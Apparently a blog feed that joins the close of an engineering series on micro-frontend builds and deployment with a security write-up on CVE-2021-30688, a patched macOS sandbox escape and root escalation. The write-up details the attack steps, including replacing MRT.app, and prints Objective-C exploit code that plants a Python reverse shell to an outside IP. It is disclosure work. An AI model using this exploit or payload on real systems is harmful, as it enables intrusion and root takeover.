  • Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.

We recommend you choose the solution that works best for your codebase. For some applications, going granular is an ideal solution and leads to the best performance. For others it could be a bad decision, and your customers could end up pulling down a ton of granular files when it would have made more sense to have them pull down one larger bundle. So, as we did, run your own performance analysis and use that as the basis for your approach.

Pitfalls

When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.

Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable.io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from sub directories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and shared it via module federation.

To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).

We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more javascript than necessary.

We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.
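To make the three levels of imports concrete, they looked roughly like the sketch below (module and symbol names are illustrative):

// Level 1: main index, pulls in everything under tenable-io/common
import { SomeComponent, someUtil } from 'tenable-io/common';
// Level 2: subdirectory index, pulls in everything under the components directory
import { SomeComponent as AlsoSomeComponent } from 'tenable-io/common/components';
// Level 3: a specific file, pulls in just one component
import SomeComponentAgain from 'tenable-io/common/components/component1';
// Because all three entry points were exposed and shared via module federation, the browser could
// end up downloading the same component three times, once inside each of the bundles above.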

As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.

Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. In the first update, the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. In this case, that’s okay because the code is constrained to an actual file. In this instance, App A and B will use their own versions within each of their bundles. As a result, they can both operate independently without bugs.

However, when it comes to things like state (Redux for us), storage (window.storage, document.cookies, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is getting stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.
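A contrived sketch of that failure mode is shown below; the store shape and selector names are made up for illustration.

// App A was built against the old shared notifications code:
const selectNotificationsOld = (state) => state.notices;        // reads state.notices

// App B was built against the new shared notifications code:
const selectNotificationsNew = (state) => state.notifications;  // reads state.notifications

// Both micro-apps run in the same page and share one Redux store in memory. If App B's reducer
// now writes to state.notifications while App A still reads state.notices, App A silently sees
// no notifications at all, even though nothing in its own bundle changed.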

As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, store, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.

Summary

At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.



8. Building & Deploying

16 December 2021 at 18:45

Building & Deploying

This is post 8 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the final phase of our new architecture where we build and deploy our application utilizing our new micro-frontend model.

The Problem

If you have followed along up until this point, you can see how we started with a relatively simple architecture. Like a lot of companies, our build and deployment flow looked something like this:

  1. An engineer merges their code to master.
  2. A Jenkins build is triggered that lints, tests, and builds the entire application.
  3. The built application is then deployed to a QA environment.
  4. End-2-End (E2E) tests are run against the QA environment.
  5. The application is deployed to production. In a CI/CD flow this occurs automatically if the E2E tests pass; otherwise it is a manual deployment.

In our new flow this would no longer work. In fact, one of our biggest challenges in implementing this new architecture was in setting up the build and deployment process to transition from a single build (as demonstrated above) to multiple applications and libraries.

The Solution

Our new solution involved three primary Jenkins jobs:

  1. Seed Job — Responsible for identifying which applications/libraries need to be rebuilt (via the nx affected command). Once this is determined, its primary purpose is to kick off one or more instances of the next two job types discussed below.
  2. Library Job — Responsible for linting and testing any library workspace that was impacted by a change.
  3. Micro-App Jobs — A series of jobs pertaining to each micro-app. Responsible for linting, testing, building, and deploying the micro-app.

With this understanding in place, let’s walk through the steps of the new flow:

Phase 1 — In our new flow, phase 1 includes building and deploying the code to our QA environments where it can be properly tested and viewed by our various internal stakeholders (engineers, quality assurance, etc.):

  1. An engineer merges their code to master. In the diagram below, an engineer on Team 3 merges some code that updates something in their application (Application C).
  2. The Jenkins seed job is triggered, and it identifies what applications and libraries were impacted by this change. This job now kicks off an entirely independent pipeline related to the updated application. In this case, it kicked off the Application C pipeline in Jenkins.
  3. The pipeline now lints, tests, and builds Application C. It’s important to note here how it’s only dealing with a piece of the overall application. This greatly improves the overall build times and avoids long queues of builds waiting to run.
  4. The built application is then deployed to the QA environments.
  5. End-2-End (E2E) tests are run against the QA environments.
  6. Our deployment is now complete. We felt that a manual deployment to production was a safe approach that still offered the flexibility and efficiency we needed.
Phase 1 Highlighted — Deploying to QA environments

Phase 2 — This phase (shown in the diagram after the dotted line) occurred when an engineer was ready to deploy their code to production:

  1. An engineer deployed their given micro-app to staging. In this case, the engineer would go into the build for Application C and deploy from there.
  2. For our purposes, we deployed to a staging environment before production to perform a final spot check on our application. In this type of architecture, you may encounter bugs that arise only from the decoupled nature of your micro-apps. You can read more about this type of issue in the previous article under the Sharing State/Storage/Theme section. This final staging environment allowed us to catch these issues before they made their way to production.
  3. The application is then deployed to production.
Phase 2 Highlighted — Deploying to production environments

While this flow has more steps than our original one, we found that the pros outweigh the cons. Our builds are now more efficient as they can occur in parallel and only have to deal with a specific part of the repository. Additionally, our teams can now move at their own pace, deploying to production when they see fit.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn the specifics of how we build and deploy our applications.

Build Strategy

We will now discuss the three job types discussed above in more detail. These include the following: seed job, library job, and micro-app jobs.

The Seed Job

This job is responsible for first identifying which applications/libraries need to be rebuilt. How is this done? We now come full circle to the importance of the NX framework introduced in a previous article. By taking advantage of this framework, we created a system that can identify which applications and libraries (our “workspaces”) were impacted by a given change in the system (via the nx affected command). Leveraging this functionality, the build logic was updated to include a Jenkins seed job. A seed job is a normal Jenkins job that runs a Job DSL script; in turn, the script contains instructions that create and trigger additional jobs. In our case, this includes micro-app jobs and/or a library job, which we’ll discuss in detail later.
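A rough sketch of the seed job's detection step is shown below, assuming an NX workspace and shelling out to the nx affected commands; the actual job triggering is done through the Job DSL and is elided here.

// seed.js (sketch): determine which workspaces a change touched
const { execSync } = require('child_process');

function affected(type, base) {
  // `nx affected:apps` / `nx affected:libs` print the impacted workspaces; --plain gives a space-separated list
  const out = execSync(`npx nx affected:${type} --plain --base=${base}`, { encoding: 'utf8' });
  return out.trim().split(/\s+/).filter(Boolean);
}

const base = process.env.NX_BASE || 'origin/master'; // how the base ref is chosen is covered below
const apps = affected('apps', base);
const libs = affected('libs', base);

// The real seed job would now use the Job DSL to trigger one micro-app job per entry in `apps`,
// plus a single library job if `libs` is non-empty.
console.log({ apps, libs });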

Jenkins Status — An important aspect of the seed job is to provide a visualization for all the jobs it kicks off. All the triggered application jobs are shown in one place along with their status:

  • Green — Successful build
  • Yellow — Unstable
  • Blue — Still processing
  • Red (not shown) — Failed build

GitHub Status — Since multiple independent Jenkins builds are triggered for the same commit ID, we had to pay attention to how the changes are represented in GitHub so we would not lose visibility of broken builds in the PR process. Each job registers itself with a unique context in GitHub, providing feedback on which sub-job failed directly in the PR:

Performance, Managing Dependencies — Before a given micro-app and/or library job can perform its necessary steps (lint, test, build), it needs to install the necessary dependencies for those actions (those defined in the package.json file of the project). Doing this every single time a job is run is very costly in terms of resources and performance. Since all of these jobs need the same dependencies, it makes much more sense if we can perform this action once so that all the jobs can leverage the same set of dependencies.

To accomplish this, the node execution environment was dockerised with all necessary dependencies installed inside a container. As shown below, the seed job maintains the responsibility for keeping this container in sync with the required dependencies. The seed job determines if a new container is required by checking if changes have been made to package.json. If changes are made, the seed job generates the new container prior to continuing any further analysis and/or build steps. The jobs that are kicked off by the seed (micro-app jobs and the library job) can then leverage that container for use:

This approach led to the following benefits:

  • Proved to be much faster than downloading all development dependencies for each build (step) every time needed.
  • The use of a pre-populated container reduced the load on the internal Nexus repository manager as well as the network traffic.
  • Allowed us to run the various build steps (lint, unit test, package) in parallel thus further improving the build times.

Performance, Limiting The Number Of Builds Run At Once — To facilitate the smooth operation of the system, the seed jobs on master and feature branch builds use slightly different logic with respect to the number of builds that can be kicked off at any one time. This is necessary as we have a large number of active development branches and triggering excessive jobs can lead to resource shortages, especially with required agents. When it comes to the concurrency of execution, the differences between the two are:

  • Master branch — Commits immediately trigger all builds concurrently.
  • Feature branches — Allow only one seed job per branch to avoid system overload as every commit could trigger 10+ sub jobs depending on the location of the changes.

Another way we reduce the number of builds generated is how the nx affected command gets used on the master branch versus the feature branches (a sketch follows the list below):

  • Master branch — Will be called against the latest tag created for each application build. Each master / production build produces a tag of the form APP<uniqueAppId>_<buildversion>. This is used to determine if the specific application needs to be rebuilt based on the changes.
  • Feature branches — We use master as a reference for the first build on the feature branch, and any subsequent build will use the commit-id of the last successful build on that branch. This way, we are not constantly rebuilding all applications that may be affected by a diff against master, but only the applications that are changed by the commit.
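The base selection just described could be expressed roughly as follows; the tag format comes from the article, while the git plumbing and the way the last successful commit is recorded are assumptions.

// Pick the git ref that `nx affected` should diff against (sketch).
const { execSync } = require('child_process');

function git(cmd) {
  return execSync(`git ${cmd}`, { encoding: 'utf8' }).trim();
}

function baseRefFor(branch, appId) {
  if (branch === 'master') {
    // Master builds diff against the latest production tag for this app: APP<uniqueAppId>_<buildversion>
    return git(`describe --tags --match "APP${appId}_*" --abbrev=0`);
  }
  // Feature branches diff against the commit of the last successful build on that branch,
  // falling back to master for the very first build. How that commit is stored (Jenkins build
  // metadata, a marker file, etc.) is an implementation detail assumed here.
  return process.env.LAST_SUCCESSFUL_COMMIT || 'origin/master';
}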

To summarize the role of the seed job, the diagram below showcases the logical steps it takes to accomplish the tasks discussed above.

The Library Job

We will now dive into the jobs that Seed kicks off, starting with the library job. As discussed in our previous articles, our applications share code from a libs directory in our repository.

Before we go further, it’s important to understand how library code gets built and deployed. When a micro-app is built (ex. nx build host), its deployment package contains not only the application code but also all the libraries that it depends on. When we build the Host and Application 1, it creates a number of files starting with “libs_…” and “node_modules…”. This demonstrates how all the shared code (both vendor libraries and your own custom libraries) needed by a micro-app is packaged within (i.e. the micro-apps are self-reliant). While it may look like your given micro-app is extremely bloated in terms of the number of files it contains, keep in mind that a lot of those files may not actually get leveraged if the micro-apps are sharing things appropriately.

This means building the actual library code is a part of each micro-app’s build step, which is discussed below. However, if library code is changed, we still need a way to lint and test that code. If you kicked off 5 micro-app jobs, you would not want each of those jobs to perform this action as they would all be linting and testing the exact same thing. Our solution to this was to have a separate Jenkins job just for our library code, as follows:

  1. Using the nx affected:libs command, we determine which library workspaces were impacted by the change in question.
  2. Our library job then lints/tests those workspaces. In parallel, our micro-apps also lint, test and build themselves.
  3. Before a micro-app can finish its job, it checks the status of the libs build. As long as the libs build was successful, it proceeds as normal. Otherwise, all micro-apps fail as well.

The Micro-App Jobs

Now that you understand how the seed and library jobs work, let’s get into the last job type: the micro-app jobs.

Configuration — As discussed previously, each micro-app has its own Jenkins build. The build logic for each application is implemented in a micro-app specific Jenkinsfile that is loaded at runtime for the application in question. The pattern for these small snippets of code looks something like the following:

The jenkins/Jenkinsfile.template (leveraged by each micro-app) defines the general build logic for a micro-application. The default configuration in that file can then be overwritten by the micro-app:

This approach keeps all our build logic in a single place while still letting us add more micro-apps and scale accordingly. This, combined with the Job DSL, makes adding a new application to the build/deployment logic a straightforward and easy-to-follow process.

Managing Parallel Jobs — When we first implemented the build logic for the jobs, we attempted to implement as many steps as possible in parallel to make the builds as fast as possible, which you can see in the Jenkins parallel step below:

After some testing, we found that linting + building the application together takes about as much time as running the unit tests for a given product. As a result, we combined the two steps (linting, building) into one (assets-build) to optimize the performance of our build. We highly recommend you do your own analysis, as this will vary per application.

Deployment strategy

Now that you understand how the build logic works in Jenkins, let’s see how things actually get deployed.

Checkpoints — When an engineer is ready to deploy their given micro-app to production, they use a checkpoint. Upon clicking into the build they wish to deploy, they select the checkpoints option. As discussed in our initial flow diagram, we force our engineers to first deploy to our staging environment for a final round of testing before they deploy their application to production.

The particular build in Jenkins that we wish to deploy
The details of the job above where we have the ability to deploy to staging via a checkpoint

Once approval is granted, the engineer can then deploy the micro-app to production using another checkpoint:

The build in Jenkins that was created after we clicked deployToQAStaging
The details of the job above where we have the ability to deploy to production via a checkpoint

S3 Strategy — The new logic required a rework of the whole deployment strategy as well. In our old architecture, the application was deployed as a whole to a new S3 location and then the central gateway application was informed of the new location. This forced the clients to reload the entire application as a whole.

Our new strategy reduces the deployment impact to the customer by only updating the code on S3 that actually changed. This way, whenever a customer pulls down the code for the application, they are pulling a majority of the code from their browser cache and only updated files have to be brought down from S3.

One thing we had to be careful about was ensuring the index.html file is only updated after all the granular files are pushed to S3. Otherwise, we run the risk of our updated application requesting files that may not have made their way to S3 yet.
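A simplified sketch of that ordering constraint, assuming the AWS SDK for JavaScript; the bucket name, output directory and flat file listing are placeholders, and details such as content types and cache headers are omitted.

// deploy.js (sketch): upload hashed build artifacts first, index.html last
const { readdirSync, statSync, createReadStream } = require('fs');
const path = require('path');
const AWS = require('aws-sdk');

const s3 = new AWS.S3();
const BUCKET = 'example-micro-frontend-bucket';                 // placeholder
const DIST = path.join(__dirname, 'dist/apps/application-1');   // placeholder

function upload(key) {
  return s3
    .upload({ Bucket: BUCKET, Key: key, Body: createReadStream(path.join(DIST, key)) })
    .promise();
}

async function deploy() {
  const files = readdirSync(DIST).filter(
    (f) => f !== 'index.html' && statSync(path.join(DIST, f)).isFile()
  );
  await Promise.all(files.map(upload)); // content-hashed files can go up in any order
  await upload('index.html');           // the entry point goes last so it never references missing files
}

deploy().catch((err) => { console.error(err); process.exit(1); });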

Bootstrapper Job — As discussed above, micro-apps are typically deployed to an environment via an individual Jenkins job:

However, we ran into a number of instances where we needed to deploy all micro-apps at the same time. This included the following scenarios:

  • Shared state — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state. When we made updates to these areas, we could encounter bugs when the apps got out of sync.
  • Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
  • Vendor Library Update — Updating a vendor library like react where there could be only one version of the library loaded in.

To address these issues, we created the bootstrapper job. This job has two steps:

  1. Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
  2. Deploy — The artifact from the build step can then be deployed to the specified environment.

Conclusion

Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. This was the final phase of our new architecture, please see the last article in this series for a quick recap of everything we learned.



9. Wrapping Up Our Journey Implementing a Micro Frontend

16 December 2021 at 18:46

Wrapping Up Our Journey Implementing a Micro Frontend

We hope you now have a better understanding of how you can successfully create a micro-front end architecture. Before we call it a day, let’s give a quick recap of what was covered.

What You Learned

  • Why We Implemented a Micro Frontend Architecture — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
  • Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
  • Introducing Module Federation — You learned how we leverage webpack’s module federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
  • Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
  • Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — You learned how we build and deploy our application using this new model.

Key Takeaways

If you take anything away from this series, let it be the following:

The Earlier, The Better

We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.

Evaluate Before You Act

Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.

Only Build What Changed

Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.

Micro-Frontends Are Not For Everyone

We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.

Don’t Forget To Share

When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.

Be Careful Of What You Share

Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.

Summary

We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!



Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.

Background

At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root and is used only for a specific task that needs root privileges. In this case, this could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of 3 possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the mach services of lsd:

/System/Library/LaunchDaemons/com.apple.lsd.plist:

<key>MachServices</key>
	<dict>
		<key>com.apple.lsd.advertisingidentifiers</key>
		<true/>
		<key>com.apple.lsd.diagnostics</key>
		<true/>
		<key>com.apple.lsd.dissemination</key>
		<true/>
		<key>com.apple.lsd.mapdb</key>
		<true/>
	...

Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.

Permissions

XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sandboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. These entitlements are not interesting to steal from the point of view of a non-sandboxed application, because that application is not constrained by a sandbox in the first place. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable because two defense-in-depth measures were ineffective:

  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
 // Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restriction related to files and folders are:

(allow file-read* file-write*
    (require-all
        (vnode-type DIRECTORY)
        (require-any
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
    (require-all
        (vnode-type REGULAR-FILE)
        (require-any
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/com.apple.commerce.plist")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/com.apple.appstored")
    (subpath "/System/Library/Caches/OnDemandResources")
)

The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.

The regexes here are the most interesting, mainly because they are anchored neither on the left nor on the right. On the left this makes sense, as the full path may be unknown, but the lack of anchoring on the right (with $) is a mistake for the file regexes.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.

By creating a specific directory structure in the temporary files directory of our sandboxed application:

bar.appdownload/Icon/

Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.

Privesc

This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron job is a common way to escalate privileges through file creation, but the sandbox profile's path requirements would only allow writing to a subdirectory of a subdirectory of the directories holding these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:

/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
	<key>MachServices</key>
	<dict>
		<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
		<true/>
	</dict>
	<key>Program</key>
	<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app. [1]
  2. Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, is not on the SSV and runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content; MRT is the more heavy-handed solution for when Apple needs to add code to perform the removal.

Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack follows the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow access.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];

assert(!error);

/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];

assert(!error);

/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];

assert(!error);

/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

